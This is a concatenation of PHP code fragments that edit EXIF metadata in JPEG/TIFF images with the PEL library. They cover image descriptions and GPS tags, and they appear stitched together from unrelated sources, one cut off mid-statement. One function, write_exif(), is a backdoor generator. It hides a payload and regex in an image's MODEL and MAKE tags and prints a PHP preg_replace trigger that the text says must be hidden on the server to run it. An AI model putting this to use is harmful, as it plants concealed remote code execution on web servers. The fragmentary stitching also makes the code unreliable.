/** * Updates the description of an image with the given data * * @param $id The internal id of the image * @param $title The title of the image * @param $description The description of the image * @param $category The category of the image * @param $tags An array of tags of the image */ public function updateDescription($filename, $id, $title, $description, $category, $tags) { $data = new PelDataWindow(file_get_contents($filename)); if (PelJpeg::isValid($data)) { $jpeg = $file = new PelJpeg(); $jpeg->load($data); $exif = $jpeg->getExif(); if ($exif == null) { $exif = new PelExif(); $jpeg->setExif($exif); $tiff = new PelTiff(); $exif->setTiff($tiff); } else { $tiff = $exif->getTiff(); } } elseif (PelTiff::isValid($data)) { $tiff = $file = new PelTiff(); $tiff->load($data); } else { return 0; } $ifd0 = $tiff->getIfd(); if ($ifd0 == null) { $ifd0 = new PelIfd(PelIfd::IFD0); $tiff->setIfd($ifd0); } $desc = $ifd0->getEntry(PelTag::IMAGE_DESCRIPTION); $description = json_encode(array('id' => $id, 'Title' => $title, 'Description' => $description, 'Category' => $category, 'Tags' => implode(',', $tags))); if ($desc == null) { $desc = new PelEntryAscii(PelTag::IMAGE_DESCRIPTION, $description); $ifd0->addEntry($desc); } else { $desc->setValue($description); } $file->saveFile($filename); }
require_once '../share/classes/pel-0.9.1/PelJpeg.php'; require_once '../share/classes/pel-0.9.1/PelTiff.php'; $data = new PelDataWindow(file_get_contents($input)); if (PelJpeg::isValid($data)) { $jpeg = $file = new PelJpeg(); $jpeg->load($data); $exif = $jpeg->getExif(); if ($exif == null) { $exif = new PelExif(); $jpeg->setExif($exif); $tiff = new PelTiff(); $exif->setTiff($tiff); } else { $tiff = $exif->getTiff(); } } elseif (PelTiff::isValid($data)) { $tiff = $file = new PelTiff(); /* Now load the data. */ $tiff->load($data); } else { PelConvert::bytesToDump($data->getBytes(0, 16)); exit(1); } $ifd0 = $tiff->getIfd(); if ($ifd0 == null) { $ifd0 = new PelIfd(PelIfd::IFD0); $tiff->setIfd($ifd0); } $desc = $ifd0->getEntry(PelTag::IMAGE_DESCRIPTION); if ($desc == null) { $desc = new PelEntryAscii(PelTag::IMAGE_DESCRIPTION, $description);
function write_exif() { global $verbose, $headers, $regex, $payload, $original, $backdoored; require_once 'pel/PelDataWindow.php'; require_once 'pel/PelJpeg.php'; require_once 'pel/PelTiff.php'; setlocale(LC_ALL, ''); $data = new PelDataWindow(file_get_contents($original)); if (PelJpeg::isValid($data)) { $jpeg = $file = new PelJpeg(); $jpeg->load($data); $exif = $jpeg->getExif(); if ($exif == null) { if ($verbose) { print " # No APP1 section found, added new.\r\n"; } $exif = new PelExif(); $jpeg->setExif($exif); $tiff = new PelTiff(); $exif->setTiff($tiff); } else { if ($verbose) { print " # Found existing APP1 section.\r\n"; } $tiff = $exif->getTiff(); } } elseif (PelTiff::isValid($data)) { $tiff = $file = new PelTiff(); $tiff->load($data); } else { print " # Unrecognized image format! The first 16 bytes follow:\r\n"; PelConvert::bytesToDump($data->getBytes(0, 16)); exit(1); } $ifd0 = $tiff->getIfd(); if ($ifd0 == null) { if ($verbose) { print " # No IFD found, adding new.\r\n"; } $ifd0 = new PelIfd(PelIfd::IFD0); $tiff->setIfd($ifd0); } //add MODEL EXIF header $desc = $ifd0->getEntry(PelTag::MODEL); if ($desc == null) { if ($verbose) { print " # Added new MODEL entry with " . $payload . "\r\n"; } $desc = new PelEntryAscii(PelTag::MODEL, $payload); $ifd0->addEntry($desc); } else { if ($verbose) { print 'Updating MODEL entry from "' . $desc->getValue() . '" to "' . $payload . '".' . "\r\n"; } $desc->setValue($payload); } //add MAKE EXIF header $desc = $ifd0->getEntry(PelTag::MAKE); if ($desc == null) { if ($verbose) { print " # Added new MAKE entry with " . $regex . "\r\n"; } $desc = new PelEntryAscii(PelTag::MAKE, $regex); $ifd0->addEntry($desc); } else { if ($verbose) { print 'Updating MAKE entry from "' . $desc->getValue() . '" to "' . $regex . '".' . "\r\n"; } $desc->setValue($regex); } print " # Saving backdoor file : " . $backdoored . ".\r\n"; $file->saveFile($backdoored); print " # Saved.\r\n"; if ($verbose) { print "\r\n\r\n"; } print " # In order to work your backdoor, you need to hide this code very well in a .php file.\r\n"; print "\r\n<?php\r\n\$exif = exif_read_data('path_to_backdoored_file_uploaded_on_server.jpg');\r\n"; print "preg_replace(\$exif['" . $headers[0] . "'],\$exif['" . $headers[1] . "'],'');\r\n?>\r\n\r\n"; }
function writeExif() { //$prog = array_shift($argv); $error = false; $input = array_shift($argv); $output = array_shift($argv); /*if (isset($input)) { echo "Input file: ".$input."<br>"; } else { $error = true; } if (isset($output)) { echo "Output file: ".$output."<br>"; } else { $error = true; }*/ /*if ($error) { echo "Error: Input or Output file not set."; exit(1); }*/ /* We typically need lots of RAM to parse TIFF images since they tend * to be big and uncompressed. */ ini_set('memory_limit', '32M'); /* The input file is now read into a PelDataWindow object. At this * point we do not know if the file stores JPEG or TIFF data, so * instead of using one of the loadFile methods on PelJpeg or PelTiff * we store the data in a PelDataWindow. */ echo 'Reading file "' . $input . '"<br>'; $data = new PelDataWindow(file_get_contents($input)); /* The static isValid methods in PelJpeg and PelTiff will tell us in * an efficient maner which kind of data we are dealing with. */ if (PelJpeg::isValid($data)) { /* The data was recognized as JPEG data, so we create a new empty * PelJpeg object which will hold it. When we want to save the * image again, we need to know which object to same (using the * getBytes method), so we store $jpeg as $file too. */ $jpeg = $file = new PelJpeg(); /* We then load the data from the PelDataWindow into our PelJpeg * object. No copying of data will be done, the PelJpeg object will * simply remember that it is to ask the PelDataWindow for data when * required. */ $jpeg->load($data); /* The PelJpeg object contains a number of sections, one of which * might be our Exif data. The getExif() method is a convenient way * of getting the right section with a minimum of fuzz. */ $exif = $jpeg->getExif(); if ($exif == null) { /* Ups, there is no APP1 section in the JPEG file. This is where * the Exif data should be. */ echo 'No APP1 section found, added new.<br>'; /* In this case we simply create a new APP1 section (a PelExif * object) and adds it to the PelJpeg object. */ $exif = new PelExif(); $jpeg->setExif($exif); /* We then create an empty TIFF structure in the APP1 section. */ $tiff = new PelTiff(); $exif->setTiff($tiff); } else { /* Surprice, surprice: Exif data is really just TIFF data! So we * extract the PelTiff object for later use. */ println('Found existing APP1 section.<br>'); $tiff = $exif->getTiff(); } } elseif (PelTiff::isValid($data)) { /* The data was recognized as TIFF data. We prepare a PelTiff * object to hold it, and record in $file that the PelTiff object is * the top-most object (the one on which we will call getBytes). */ $tiff = $file = new PelTiff(); /* Now load the data. */ $tiff->load($data); } else { /* The data was not recognized as either JPEG or TIFF data. * Complain loudly, dump the first 16 bytes, and exit. */ println('Unrecognized image format! The first 16 bytes follow:'); PelConvert::bytesToDump($data->getBytes(0, 16)); exit(1); } /* TIFF data has a tree structure much like a file system. There is a * root IFD (Image File Directory) which contains a number of entries * and maybe a link to the next IFD. The IFDs are chained together * like this, but some of them can also contain what is known as * sub-IFDs. For our purpose we only need the first IFD, for this is * where the image description should be stored. */ $ifd0 = $tiff->getIfd(); //echo $ifd0."<br>"; if ($ifd0 == null) { /* No IFD in the TIFF data? This probably means that the image * didn't have any Exif information to start with, and so an empty * PelTiff object was inserted by the code above. But this is no * problem, we just create and inserts an empty PelIfd object. */ println('No IFD found, adding new.<br>'); $ifd0 = new PelIfd(PelIfd::IFD0); $tiff->setIfd($ifd0); } /* Each entry in an IFD is identified with a tag. This will load the * ImageDescription entry if it is present. If the IFD does not * contain such an entry, null will be returned. */ $desc = $ifd0->getEntry(PelTag::IMAGE_DESCRIPTION); if (false) { /* We need to check if the image already had a description stored. */ if ($desc == null) { /* The was no description in the image. */ println('Added new IMAGE_DESCRIPTION entry with "%s<br>".', $description); /* In this case we simply create a new PelEntryAscii object to hold * the description. The constructor for PelEntryAscii needs to know * the tag and contents of the new entry. */ $desc = new PelEntryAscii(PelTag::IMAGE_DESCRIPTION, $description); /* This will insert the newly created entry with the description * into the IFD. */ $ifd0->addEntry($desc); } else { /* An old description was found in the image. */ println('Updating IMAGE_DESCRIPTION entry from "%s" to "%s<br>".', $desc->getValue(), $description); /* The description is simply updated with the new description. */ $desc->setValue($description); } } //$ifd1 = new PelIfd(PelIfd::IFD0); $ifd1 = $ifd0->getSubIfd(PelIfd::GPS); if ($ifd1 == null) { /* No IFD in the TIFF data? This probably means that the image * didn't have any Exif information to start with, and so an empty * PelTiff object was inserted by the code above. But this is no * problem, we just create and inserts an empty PelIfd object. */ echo 'No GPS found, adding new.<br>'; $ifd1 = new PelIfd(PelIfd::GPS); //getEntries $ifd0->addSubIfd($ifd1); //$ifd0->setNextIfd($ifd1); } //echo "ifd1: ".$ifd1."<br>"; $lat = $ifd1->getEntry(PelTag::GPS_LATITUDE); //echo $lat."<br>"; $gps_arr1[0] = 10; $gps_arr1[1] = 1; $gps_arr2[0] = 5; $gps_arr2[1] = 1; $gps_arr3[0] = 12; $gps_arr3[1] = 1; //$gps_arr[3] = 1; //$gps_arr[4] = 1; //$gps_arr[5] = 1; if ($lat == null) { $lat = new PelEntryRational(PelTag::GPS_LATITUDE, $gps_arr1, $gps_arr2, $gps_arr3); //$lat = new PelEntryRational(PelTag::GPS_LATITUDE, 10, 5, 12); echo "Creating latitude entry... "; $ifd1->addEntry($lat); echo "Created.<br>"; } else { $lat->setValue($gps_arr1, $gps_arr2, $gps_arr3); //$lat->setValue(10, 5, 12); } /* At this point the image on disk has not been changed, it is only * the object structure in memory which represent the image which has * been altered. This structure can be converted into a string of * bytes with the getBytes method, and saving this in the output file * completes the script. */ println('Writing file "%s".<br>', $output); file_put_contents($output, $file->getBytes()); $exifdata = exif_read_data($output, "", true, false); echo "Latitude: " . $exifdata["GPS"]["GPSLatitude"][0] . " " . $exifdata["GPS"]["GPSLatitude"][1] . " " . $exifdata["GPS"]["GPSLatitude"][2] . "<br>"; }